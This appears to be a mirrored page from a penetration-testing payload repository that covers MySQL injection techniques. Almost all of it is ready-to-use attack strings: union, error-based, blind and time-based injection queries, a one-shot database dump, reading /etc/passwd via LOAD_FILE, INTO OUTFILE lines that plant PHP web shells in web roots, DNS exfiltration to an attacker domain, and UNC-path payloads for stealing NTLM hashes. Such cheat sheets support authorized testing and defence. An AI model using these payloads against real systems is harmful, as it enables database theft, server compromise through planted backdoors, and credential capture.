mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-19 10:56:10 +00:00
233 lines
8.0 KiB
Markdown
233 lines
8.0 KiB
Markdown
# MYSQL Injection
|
|
|
|
## MYSQL
|
|
|
|
```sql
|
|
# MYSQL Comment
|
|
/* MYSQL Comment */
|
|
/*! MYSQL Special SQL */
|
|
/*!32302 10*/ Comment for MYSQL version 3.23.02
|
|
```
|
|
|
|
## Detect columns number
|
|
|
|
Using a simple ORDER
|
|
|
|
```sql
|
|
order by 1
|
|
order by 2
|
|
order by 3
|
|
...
|
|
order by XXX
|
|
```
|
|
|
|
## MYSQL Union Based
|
|
|
|
```sql
|
|
UniOn Select 1,2,3,4,...,gRoUp_cOncaT(0x7c,schema_name,0x7c)+fRoM+information_schema.schemata
|
|
UniOn Select 1,2,3,4,...,gRoUp_cOncaT(0x7c,table_name,0x7C)+fRoM+information_schema.tables+wHeRe+table_schema=...
|
|
UniOn Select 1,2,3,4,...,gRoUp_cOncaT(0x7c,column_name,0x7C)+fRoM+information_schema.columns+wHeRe+table_name=...
|
|
UniOn Select 1,2,3,4,...,gRoUp_cOncaT(0x7c,data,0x7C)+fRoM+...
|
|
```
|
|
|
|
### Extract columns name without information_schema
|
|
|
|
Method for `MySQL >= 4.1`.
|
|
|
|
First extract the column number with
|
|
```sql
|
|
?id=(1)and(SELECT * from db.users)=(1)
|
|
-- Operand should contain 4 column(s)
|
|
```
|
|
|
|
Then extract the column name.
|
|
```sql
|
|
?id=1 and (1,2,3,4) = (SELECT * from db.users UNION SELECT 1,2,3,4 LIMIT 1)
|
|
--Column 'id' cannot be null
|
|
```
|
|
|
|
Method for `MySQL 5`
|
|
|
|
```sql
|
|
-1 UNION SELECT * FROM (SELECT * FROM users JOIN users b)a
|
|
--#1060 - Duplicate column name 'id'
|
|
|
|
-1 UNION SELECT * FROM (SELECT * FROM users JOIN users b USING(id))a
|
|
-- #1060 - Duplicate column name 'name'
|
|
|
|
-1 UNION SELECT * FROM (SELECT * FROM users JOIN users b USING(id,name))a
|
|
...
|
|
```
|
|
|
|
### Extract data without information_schema
|
|
|
|
Extracting data from the 4th column without knowing its name.
|
|
|
|
```sql
|
|
select `4` from (select 1,2,3,4,5,6 union select * from users)dbname;
|
|
```
|
|
|
|
Injection example inside the query `select author_id,title from posts where author_id=[INJECT_HERE]`
|
|
|
|
```sql
|
|
MariaDB [dummydb]> select author_id,title from posts where author_id=-1 union select 1,(select concat(`3`,0x3a,`4`) from (select 1,2,3,4,5,6 union select * from users)a limit 1,1);
|
|
+-----------+-----------------------------------------------------------------+
|
|
| author_id | title |
|
|
+-----------+-----------------------------------------------------------------+
|
|
| 1 | a45d4e080fc185dfa223aea3d0c371b6cc180a37:veronica80@example.org |
|
|
+-----------+-----------------------------------------------------------------+
|
|
```
|
|
|
|
|
|
## MYSQL Error Based - Basic
|
|
|
|
Works with `MySQL >= 4.1`
|
|
|
|
```sql
|
|
(select 1 and row(1,1)>(select count(*),concat(CONCAT(@@VERSION),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))
|
|
'+(select 1 and row(1,1)>(select count(*),concat(CONCAT(@@VERSION),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'
|
|
```
|
|
|
|
## MYSQL Error Based - UpdateXML function
|
|
|
|
```sql
|
|
AND updatexml(rand(),concat(CHAR(126),version(),CHAR(126)),null)-
|
|
AND updatexml(rand(),concat(0x3a,(SELECT concat(CHAR(126),schema_name,CHAR(126)) FROM information_schema.schemata LIMIT data_offset,1)),null)--
|
|
AND updatexml(rand(),concat(0x3a,(SELECT concat(CHAR(126),TABLE_NAME,CHAR(126)) FROM information_schema.TABLES WHERE table_schema=data_column LIMIT data_offset,1)),null)--
|
|
AND updatexml(rand(),concat(0x3a,(SELECT concat(CHAR(126),column_name,CHAR(126)) FROM information_schema.columns WHERE TABLE_NAME=data_table LIMIT data_offset,1)),null)--
|
|
AND updatexml(rand(),concat(0x3a,(SELECT concat(CHAR(126),data_info,CHAR(126)) FROM data_table.data_column LIMIT data_offset,1)),null)--
|
|
```
|
|
|
|
Shorter to read:
|
|
|
|
```sql
|
|
' and updatexml(null,concat(0x0a,version()),null)-- -
|
|
' and updatexml(null,concat(0x0a,(select table_name from information_schema.tables where table_schema=database() LIMIT 0,1)),null)-- -
|
|
```
|
|
|
|
## MYSQL Error Based - Extractvalue function
|
|
|
|
Works with `MySQL >= 5.1`
|
|
|
|
```sql
|
|
AND extractvalue(rand(),concat(CHAR(126),version(),CHAR(126)))--
|
|
AND extractvalue(rand(),concat(0x3a,(SELECT concat(CHAR(126),schema_name,CHAR(126)) FROM information_schema.schemata LIMIT data_offset,1)))--
|
|
AND extractvalue(rand(),concat(0x3a,(SELECT concat(CHAR(126),TABLE_NAME,CHAR(126)) FROM information_schema.TABLES WHERE table_schema=data_column LIMIT data_offset,1)))--
|
|
AND extractvalue(rand(),concat(0x3a,(SELECT concat(CHAR(126),column_name,CHAR(126)) FROM information_schema.columns WHERE TABLE_NAME=data_table LIMIT data_offset,1)))--
|
|
AND extractvalue(rand(),concat(0x3a,(SELECT concat(CHAR(126),data_info,CHAR(126)) FROM data_table.data_column LIMIT data_offset,1)))--
|
|
```
|
|
|
|
## MYSQL Blind with substring equivalent
|
|
|
|
```sql
|
|
?id=1 and substring(version(),1,1)=5
|
|
?id=1 and right(left(version(),1),1)=5
|
|
?id=1 and left(version(),1)=4
|
|
?id=1 and ascii(lower(substr(Version(),1,1)))=51
|
|
?id=1 and (select mid(version(),1,1)=4)
|
|
```
|
|
|
|
## MYSQL Blind using a conditional statement
|
|
|
|
TRUE: `if @@version starts with a 5`:
|
|
|
|
```sql
|
|
2100935' OR IF(MID(@@version,1,1)='5',sleep(1),1)='2
|
|
Response:
|
|
HTTP/1.1 500 Internal Server Error
|
|
```
|
|
|
|
False: `if @@version starts with a 4`:
|
|
|
|
```sql
|
|
2100935' OR IF(MID(@@version,1,1)='4',sleep(1),1)='2
|
|
Response:
|
|
HTTP/1.1 200 OK
|
|
```
|
|
|
|
## MYSQL Blind with MAKE_SET
|
|
|
|
```sql
|
|
AND MAKE_SET(YOLO<(SELECT(length(version()))),1)
|
|
AND MAKE_SET(YOLO<ascii(substring(version(),POS,1)),1)
|
|
AND MAKE_SET(YOLO<(SELECT(length(concat(login,password)))),1)
|
|
AND MAKE_SET(YOLO<ascii(substring(concat(login,password),POS,1)),1)
|
|
```
|
|
|
|
## MYSQL Blind with wildcard character
|
|
|
|
['_'](https://www.w3resource.com/sql/wildcards-like-operator/wildcards-underscore.php) acts like the regex character '.', use it to speed up your blind testing
|
|
|
|
```sql
|
|
SELECT cust_code FROM customer WHERE cust_name LIKE 'k__l';
|
|
```
|
|
|
|
## MYSQL Time Based
|
|
|
|
```sql
|
|
+BENCHMARK(40000000,SHA1(1337))+
|
|
'%2Bbenchmark(3200,SHA1(1))%2B'
|
|
' OR IF(MID(@@version,1,1)='5',sleep(1),1)='2
|
|
|
|
AND [RANDNUM]=BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')) //SHA1
|
|
RLIKE SLEEP([SLEEPTIME])
|
|
OR ELT([RANDNUM]=[RANDNUM],SLEEP([SLEEPTIME]))
|
|
|
|
?id=1 and IF(ASCII(SUBSTRING((SELECT USER()),1,1)))>=100,1, BENCHMARK(2000000,MD5(NOW()))) --
|
|
?id=1 and IF(ASCII(SUBSTRING((SELECT USER()), 1, 1)))>=100, 1, SLEEP(3)) --
|
|
```
|
|
|
|
## MYSQL DIOS - Dump in One Shot
|
|
|
|
```sql
|
|
(select (@) from (select(@:=0x00),(select (@) from (information_schema.columns) where (table_schema>=@) and (@)in (@:=concat(@,0x0D,0x0A,' [ ',table_schema,' ] > ',table_name,' > ',column_name,0x7C))))a)#
|
|
(select (@) from (select(@:=0x00),(select (@) from (db_data.table_data) where (@)in (@:=concat(@,0x0D,0x0A,0x7C,' [ ',column_data1,' ] > ',column_data2,' > ',0x7C))))a)#
|
|
```
|
|
|
|
## MYSQL Read content of a file
|
|
|
|
Need the `filepriv`, otherwise you will get the error : `ERROR 1290 (HY000): The MySQL server is running with the --secure-file-priv option so it cannot execute this statement`
|
|
|
|
```sql
|
|
' UNION ALL SELECT LOAD_FILE('/etc/passwd') --
|
|
```
|
|
|
|
## MYSQL DROP SHELL
|
|
|
|
```sql
|
|
SELECT "<?php system($_GET['cmd']); ?>" into outfile "C:\\xampp\\htdocs\\backdoor.php"
|
|
SELECT '' INTO OUTFILE '/var/www/html/x.php' FIELDS TERMINATED BY '<?php phpinfo();?>
|
|
-1 UNION SELECT 0xPHP_PAYLOAD_IN_HEX, NULL, NULL INTO DUMPILE 'C:/Program Files/EasyPHP-12.1/www/shell.php'
|
|
[...] UNION SELECT 1,2,3,4,5,0x3c3f70687020706870696e666f28293b203f3e into outfile 'C:\\wamp\\www\\pwnd.php'-- -
|
|
[...] union all select 1,2,3,4,"<?php echo shell_exec($_GET['cmd']);?>",6 into OUTFILE 'c:/inetpub/wwwroot/backdoor.php'
|
|
```
|
|
|
|
## MYSQL Out of band
|
|
|
|
```powershell
|
|
select @@version into outfile '\\\\192.168.0.100\\temp\\out.txt';
|
|
select @@version into dumpfile '\\\\192.168.0.100\\temp\\out.txt
|
|
```
|
|
|
|
DNS exfiltration
|
|
|
|
```sql
|
|
select load_file(concat('\\\\',version(),'.hacker.site\\a.txt'));
|
|
select load_file(concat(0x5c5c5c5c,version(),0x2e6861636b65722e736974655c5c612e747874))
|
|
```
|
|
|
|
UNC Path - NTLM hash stealing
|
|
|
|
```sql
|
|
select load_file('\\\\error\\abc');
|
|
select load_file(0x5c5c5c5c6572726f725c5c616263);
|
|
select 'osanda' into dumpfile '\\\\error\\abc';
|
|
select 'osanda' into outfile '\\\\error\\abc';
|
|
load data infile '\\\\error\\abc' into table database.table_name;
|
|
```
|
|
|
|
## References
|
|
|
|
- [MySQL Out of Band Hacking - @OsandaMalith](https://www.exploit-db.com/docs/english/41273-mysql-out-of-band-hacking.pdf)
|
|
- [[Sqli] Extracting data without knowing columns names - Ahmed Sultan @0x4148](https://blog.redforce.io/sqli-extracting-data-without-knowing-columns-names/)
|
|
- [Help по MySql инъекциям - rdot.org](https://rdot.org/forum/showpost.php?p=114&postcount=1) |